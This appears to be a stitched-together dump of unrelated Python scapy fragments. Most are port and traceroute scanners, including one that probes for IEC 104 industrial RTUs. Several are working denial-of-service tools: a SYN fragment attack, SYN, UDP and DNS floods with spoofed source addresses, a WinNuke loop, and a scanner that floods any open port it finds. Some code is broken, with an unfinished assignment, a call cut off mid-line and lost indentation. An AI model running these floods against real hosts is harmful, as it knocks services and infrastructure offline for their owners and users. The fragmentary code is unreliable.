def Syn_fragment():
clear = os.system('clear')
print("**************************************")
print(" SYN FragmentAttack")
print("**************************************")
print("Please input your target's IP")
dst_ip = input("[SYN Fragment]#")
src_ip = scapy.RandIP()
#zidong sheng cheng yuan duankou he mudi duankou
src_port = scapy.RandShort()
dst_port = scapy.RandShort()
packet_number = 0
try:
while True:
packet = scapy.IP(src=src_ip, dst=dst_ip, flags=[
0x2000
], frag=1) / scapy.TCP(dport=80, flags="S") / ("X" * 6000)
#packet = scapy.IP(dst=dst_ip,flags=[0x2000],frag=1)/scapy.TCP(dport=80,flags="F")/("X"*6000)
scapy.send(packet, verbose=False)
packet_number += 1
print("[+]Sent packet is " + str(packet_number))
except KeyboardInterrupt:
print("[-]Ctrl + C detected ....")
def GenerateSourcePort(source, port):
if type(source) == "<class 'int'>":
return int(source)
if source == "MIRROR":
return int(port)
if source == "RAND":
return int(scapy.RandShort())
def scanTCPPort(ip, port_dict, queue): while True: dst_port = queue.get() src_port = scapy.RandShort() packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port, dport=dst_port, flags="S") response = scapy.sr1(packet, verbose=False, timeout=5) if response is None: port_dict[dst_port]="Closed" elif(response.haslayer(scapy.TCP)): # If the packet returned had the SYN and ACK flags if(response.getlayer(scapy.TCP).flags == 0x12): # Send TCP packet back to host with ACK and RST flags packet = scapy.IP(dst=ip)/scapy.TCP(sport=src_port,dport=dst_port,flags=0x14) send_rst = scapy.sr(packet, verbose=False, timeout=5) port_dict[dst_port]="Open" # If the packet returned had the RST and ACK flags elif (response.getlayer(scapy.TCP).flags == 0x14): port_dict[dst_port]="Closed" else: port_dict[dst_port]="Closed" queue.task_done()
def escanearPuertos(host):
print("\nEscaneando los puertos de la IP:", host)
try:
for puerto in listaPuertos:
puertoOrigen = scapy.RandShort(
) #para que el paquete enviado tenga un puerto distinto cada vez
paquete = scapy.IP(dst=host) / scapy.TCP(
sport=puertoOrigen, dport=puerto, flags="S")
respuesta = scapy.sr1(paquete, timeout=2)
if ("NoneType" in str(type(respuesta))):
pass
elif (respuesta.haslayer(scapy.TCP)
and respuesta.getlayer(scapy.TCP).flags == 0x12):
p = scapy.IP(dst=host) / scapy.TCP(
sport=puertoOrigen, dport=puerto, flags="R")
rst = scapy.sr(
p, timeout=1
) #envío con flag RST activa para cortar la conexión
try:
servicio = scapy.socket.getservbyport(
puerto) # obtiene info del puerto(si es conocido)
except:
servicio = "¿?"
print("[ABIERTO]", puerto, " -> ", servicio)
sendPackage(
host, puerto, 2000
) # si existe un puerto abierto, se envían paquetes para "denegar" el servicio
except KeyboardInterrupt:
print("Abortado por usuario")
def synPacket(tragetIp, tragetPort, networkIp):
ip = scapy.IP(dst=networkIp, src=tragetIp)
tcp = scapy.TCP(sport=scapy.RandShort(), dport=tragetPort, flags='S')
raw = scapy.Raw(b"x" * 1024)
packet = ip / tcp / raw
scapy.send(packet, loop=0, verbose=0)
def sendPackage(ipDestino, puertoDestino, cantPack):
IP_ORIGEN = "192.168.0.45"
puertoOrigen = scapy.RandShort(
) #para que el paquete enviado tenga un puerto distinto cada vez
print("\nComienza envio de paquetes a " + ipDestino)
scapy.send(scapy.IP(src=IP_ORIGEN, dst=ipDestino) /
scapy.TCP(sport=puertoOrigen, dport=puertoDestino),
count=cantPack)
print("Finaliza envio de paquetes a " + ipDestino)
def traceroute_dns_servers(hosts, fqdn):
"""
Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests.
"""
log.info("Running UDP traceroutes to %d servers." % len(hosts))
addrs = [host.addr for host in hosts]
udp_datagram = scapy.UDP(sport=scapy.RandShort())
dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn))
return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def Port_Scan(name):
num = 0
#src_ip ="123.123.123."+str(name)
try:
while True:
packet = scapy.IP(dst=target) / scapy.TCP(dport=scapy.RandShort(),
flags="S")
scapy.send(packet, count=1500, verbose=False)
num += 1
print("Process:%s,Attack:%s" % (name, num))
except KeyboardInterrupt:
print("Go back")
def UDP_Flood(name):
num =
i =1
try:
while True:
if (i > 0) is True:
src_ip ="123.123.125."+str(i)
packet = scapy.IP(src=src_ip,dst = target)/scapy.UDP(sport=scapy.RandShort())
scapy.send(packet,count=1500,verbose=False)
num +=1
print("Process:%s,Attack:%s"%(name,num))
except KeyboardInterrupt:
print("QUIT!")
def ack_scan(target, port):
source_port = scapy.RandShort()
ip_scan_packet = scapy.IP(dst=target)
tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='A')
scan_packet = ip_scan_packet / tcp_scan_packet
scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False)
if scan_response != None:
if scan_response.haslayer(scapy.TCP):
if scan_response[scapy.TCP].flags == 4:
return "Unfiltered"
elif int(scan_response[scapy.ICMP].type) == 3 and int(
scan_response[scapy.ICMP].code) in [1, 2, 3, 9, 10, 13]:
return "Filtered"
else:
return "Filtered"
def scan_port(device_ip, port_to_scan):
srcport = scapy.RandShort()
SYNACK_packet = scapy.sr1(scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan, flags="S"),
timeout=.008) # packet with sync flag
if SYNACK_packet is None: # if there are no response
return False
pkt_flags = SYNACK_packet.getlayer(scapy.TCP).flags # get flag
if pkt_flags == SynAck:
Rst_packet = scapy.IP(dst=device_ip) / scapy.TCP(sport=srcport, dport=port_to_scan,
flags="R") # packet with reset flag
scapy.send(Rst_packet)
return True
else:
return False
def tcp_scan(self):
src_port = s.RandShort()
tcp_connect_scan_resp = s.sr1(
s.IP(dst=self.host) /
s.TCP(sport=src_port, dport=self.port, flags="S"),
timeout=self.timeout)
if (str(type(tcp_connect_scan_resp)) == "<type 'NoneType'>"):
return False
elif (tcp_connect_scan_resp.haslayer(s.TCP)):
if (tcp_connect_scan_resp.getlayer(s.TCP).flags == 0x12):
# send TCP RST
s.sr(s.IP(dst=self.host) /
s.TCP(sport=src_port, dport=self.port, flags="AR"),
timeout=self.timeout)
return True
elif (tcp_connect_scan_resp.getlayer(s.TCP).flags == 0x14):
return False
def SYN_Flood(name):
num = 0
i = 1
try:
while True:
if (i > 0) is True:
i += 1
src_ip = "123.123.123." + str(i)
packet = scapy.IP(src=src_ip, dst=target) / scapy.TCP(
sport=scapy.RandShort(), dport=80, flags="S")
scapy.send(packet, count=1500, verbose=False)
num += 1
print("Process:%s,Attack:%s" % (name, num))
except KeyboardInterrupt:
print("Go back")
def window_scan(target, port):
source_port = scapy.RandShort()
ip_scan_packet = scapy.IP(dst=target)
tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='A')
scan_packet = ip_scan_packet / tcp_scan_packet
scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False)
if scan_response != None:
if scan_response.haslayer(scapy.TCP):
if scan_response[scapy.TCP].flags == 4 and int(
scan_response[scapy.TCP].window) > 0:
return "Open"
elif scan_response[scapy.TCP].flags == 4 and int(
scan_response[scapy.TCP].window) == 0:
return "Closed"
else:
return "Filtered"
def udp_scan(target, port):
source_port = scapy.RandShort()
ip_scan_packet = scapy.IP(dst=target)
udp_scan_packet = scapy.UDP(sport=source_port, dport=port)
scan_packet = ip_scan_packet / udp_scan_packet
scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False)
if scan_response != None:
if scan_response.haslayer(scapy.UDP):
return "Open"
elif int(scan_response[scapy.ICMP].type) == 3 and int(
scan_response[scapy.ICMP].code) == 3:
return "Closed"
elif int(scan_response[scapy.ICMP].type) == 3 and int(
scan_response[scapy.ICMP].code) in [1, 2, 9, 10, 13]:
return "Filtered"
else:
return "Open|Filtered"
def tcp_scan(target_ip, target_port):
try:
src_port = scapy.RandShort()
tcp_packet = scapy.TCP(sport=src_port, dport=target_port, flags="S")
ip_packet = scapy.IP(dst=target_ip)
packet_sent = ip_packet / tcp_packet
response = scapy.sr1(packet_sent, timeout=0.5, verbose=False)
flag = response.getlayer(scapy.TCP).flags
if flag == synack:
result = "port {} : open ".format(target_port)
elif flag == rstack:
result = False
connection_close = scapy.IP(dst=target_ip) / scapy.TCP(sport=134, dport=target_port, flags="AR")
scapy.send(connection_close, verbose=False)
return result
except AttributeError:
return False
except KeyboardInterrupt:
print("[-] ctr+c ... Quiting")
sys.exit(1)
def run(self, q):
try:
ans, unans = s.sr(s.IP(dst=str(self.host), ttl=(1, 30)) / s.TCP(sport=s.RandShort(), dport=80), retry=2,
timeout=5)
self.success = True
rtr_index = 0
for snd, rcv in ans:
if self.routers[rtr_index] == rcv.fields['src']:
# found the next router in our list
rtr_index += 1
if len(self.routers) == rtr_index:
# ran out of routers to look for, all done!
break
else:
# found some router that didn't match
self.success = False
break
except:
self.success = False
return q.put(self.create_result())
def DNS_Flood():
clear = os.system('clear')
#s = scapy.RandString(scapy.RandNum(1,10))
#s1 ='www'
#print(s1)
#a = scapy.RandNum(1,10)
#print(a)
#s2 = scapy.RandString(scapy.RandNum(1,5))
#s2 = s2.lower()
#s2 = str(s2)
#s2 = s2[2:-1]
#print(s2)
#process_id =process_id
#s3 = 'com'
#s = s1+'.'+s2+'.'+s3
#print("Please input target's IP:")
#target = input("[DNS_Flood]#")
#target = "172.16.4.80"
#src_ip = scapy.RandIP()
#print(s)
num = 0
try:
while True:
packet = scapy.IP(dst="172.16.4.80") / scapy.UDP(
sport=scapy.RandShort(), dport=53) / scapy.DNS(
rd=1, qd=scapy.DNSQR(qname="www.flood.com"))
#packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com"))
#packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S")
#scapy.srflood(packet)
scapy.send(packet, count=2000, verbose=False)
#scapy.send(packets,verbose=False)
num += 1
#if num == 1000:
#print("%s,%s"%(name,num))
print(num)
except KeyboardInterrupt:
print("[-] Ctrl + C detected.....")
def run(self, rps, profile):
while True:
# print_w_pid('Filling buffer ...')
# print_w_pid('Selected profile: %s' % profile)
while rps != len(self.buffer):
# Define IP headers
ip_h = scapy.IP()
ip_h.dst = self.dst
if profile == 'SYN_flood':
ip_h.src = next(self.ip_generator)
# Define TCP headers
tcp_h = scapy.TCP()
tcp_h.sport = scapy.RandShort()
tcp_h.dport = self.dport
tcp_h.flags = 'S'
# Assemble the network package
pkt = ip_h / tcp_h
self.buffer.append(pkt)
self.sent_counter, self.time_last_insertion, self.avg_rps_counter = \
self._send_batch(self.buffer, self.sent_counter, self.time_last_insertion, self.avg_rps_counter)
self.buffer[:] = []
def syn_scan(target, port):
source_port = scapy.RandShort()
ip_scan_packet = scapy.IP(dst=target)
tcp_scan_packet = scapy.TCP(sport=source_port, dport=port, flags='S')
scan_packet = ip_scan_packet / tcp_scan_packet
scan_response = scapy.sr1(scan_packet, timeout=1, verbose=False)
if scan_response != None:
if scan_response.haslayer(scapy.TCP):
if scan_response[scapy.TCP].flags == 18:
ip_reset_packet = scapy.IP(dst=target)
tcp_reset_packet = scapy.TCP(sport=source_port,
dport=port,
flags='R')
reset_packet = ip_reset_packet / tcp_reset_packet
reset_response = scapy.send(reset_packet, verbose=False)
return "Open"
elif scan_response[scapy.TCP].flags == 20:
return "Closed"
else:
return "Filtered"
def open(self):
self.sock = scapy.L3RawSocket()
try:
# syn
tcp = scapy.TCP(
dport=self.dport,
sport=scapy.RandShort(),
flags='S',
)
p = self.sock.sr1(
scapy.IP(dst=self.dst) / tcp,
verbose=self.verbose,
)
self.sport = p[scapy.TCP].dport
self.wseq = p[scapy.TCP].ack
self.rseq = p[scapy.TCP].seq
# ack
tcp = scapy.TCP(
dport=self.dport,
sport=self.sport,
seq=self.wseq,
ack=self.rseq + 1,
flags='A',
)
self.sock.send(scapy.IP(dst=self.dst) / tcp)
except:
self.sock.close()
self.sock = None
raise
@contextlib.contextmanager
def _close():
try:
yield
finally:
self.close()
return _close()
def WinNuke():
clear = os.system('clear')
print("**************************************")
print(" WinNuke Attack")
print("**************************************")
print("Please input your target's IP")
target = input("[WinNuke Attack]#")
num = 0
try:
while True:
packetss = scapy.IP(src=scapy.RandIP(), dst=target) / scapy.TCP(
sport=scapy.RandShort(),
dport=[139, 138, 137],
flags=0x020,
seq=1,
window=512)
scapy.send(packetss, verbose=False)
num += 1
print("Sent " + str(num) + "packets")
except KeyboardInterrupt:
print("[-] Ctrl + C detected.......")
def xnf_scan(target_ip, target_port, flags): # (xmas , fin , null )
# does'nt work for windows os
try:
result = ""
src_port = scapy.RandShort()
tcp_packet = scapy.TCP(sport=src_port, dport=target_port, flags=flags)
ip_packet = scapy.IP(dst=target_ip)
packet_sent = ip_packet / tcp_packet
response = scapy.sr1(packet_sent, timeout=0.5, verbose=False)
flag = response.getlayer(scapy.TCP).flags
if flag == rstack:
result = False
elif response.getlayer(scapy.ICMP):
if int(response.getlayer(scapy.ICMP).type) == 3 and int(response.getlayer(scapy.ICMP).code) in [1, 2, 3, 9,
10, 13]:
result = "port {} : Filtered ".format(target_port)
return result
except AttributeError:
return "port {} : OPEN | Filtered".format(target_port)
except KeyboardInterrupt:
print("[-] ctr+c ... Quiting")
sys.exit(1)
threads = []
for hosts in [nethosts[i:i + 16] for i in range(0, len(nethosts), 16)]:
t = Thread(target=arpscan, kwargs={'hosts': hosts})
t.start()
threads.append(t)
while len(threads):
for t in threads:
t.join(1)
if not t.is_alive():
threads.pop(threads.index(t))
print('[+] Scanning for RTUs ...')
rtus = []
for host in alive:
if host != address['addr']:
sport = scapy.RandShort()
print('[-] Trying {0:s} ...\r'.format(host), end='')
response = scapy.sr1(
scapy.IP(src=address['addr'], dst=host) /
scapy.TCP(sport=sport, dport=IEC104_PORT, flags='S'),
iface=iface,
timeout=0.1,
retry=0,
verbose=0)
if response is None:
# Filtered
pass
elif response.haslayer('TCP'):
if response['TCP'].flags == 0x12:
# Open port -- Probably an RTU
reset = scapy.sr(
import sys
import scapy.all as scapy
target = '8.8.8.8'
if len(sys.argv) == 2:
target = sys.argv[1]
ans, unans = scapy.sr(scapy.IP(dst=target, ttl=(1, 22), id=scapy.RandShort()) /
scapy.TCP(flags=0x2),
timeout=10)
for snd, rcv in ans:
print(snd.ttl, rcv.src, isinstance(rcv.payload, scapy.TCP))
